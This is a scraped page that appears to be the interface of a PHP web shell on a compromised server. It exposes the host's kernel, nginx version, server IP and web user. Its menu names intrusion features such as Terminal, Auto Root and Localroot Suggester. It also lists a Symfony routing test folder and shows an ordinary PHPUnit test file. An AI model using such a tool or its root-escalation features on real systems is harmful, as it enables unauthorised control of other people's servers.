Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.39.197
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
symfony /
routing /
Tests /
Delete
Unzip
Name
Size
Permission
Date
Action
Annotation
[ DIR ]
drwxr-xr-x
2018-11-29 09:00
DependencyInjection
[ DIR ]
drwxr-xr-x
2018-11-29 09:00
Fixtures
[ DIR ]
drwxr-xr-x
2018-11-29 09:00
Generator
[ DIR ]
drwxr-xr-x
2018-11-29 09:00
Loader
[ DIR ]
drwxr-xr-x
2018-11-29 09:00
Matcher
[ DIR ]
drwxr-xr-x
2018-11-29 09:00
CompiledRouteTest.php
1.08
KB
-rw-r--r--
2018-11-29 09:00
RequestContextTest.php
5.52
KB
-rw-r--r--
2018-11-29 09:00
RouteCollectionBuilderTest.php
14.98
KB
-rw-r--r--
2018-11-29 09:00
RouteCollectionTest.php
15.18
KB
-rw-r--r--
2018-11-29 09:00
RouteCompilerTest.php
15.33
KB
-rw-r--r--
2018-11-29 09:00
RouteTest.php
14.67
KB
-rw-r--r--
2018-11-29 09:00
RouterTest.php
5.03
KB
-rw-r--r--
2018-11-29 09:00
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Routing\Tests; use PHPUnit\Framework\TestCase; use Symfony\Component\Routing\CompiledRoute; class CompiledRouteTest extends TestCase { public function testAccessors() { $compiled = new CompiledRoute('prefix', 'regex', array('tokens'), array(), null, array(), array(), array('variables')); $this->assertEquals('prefix', $compiled->getStaticPrefix(), '__construct() takes a static prefix as its second argument'); $this->assertEquals('regex', $compiled->getRegex(), '__construct() takes a regexp as its third argument'); $this->assertEquals(array('tokens'), $compiled->getTokens(), '__construct() takes an array of tokens as its fourth argument'); $this->assertEquals(array('variables'), $compiled->getVariables(), '__construct() takes an array of variables as its ninth argument'); } }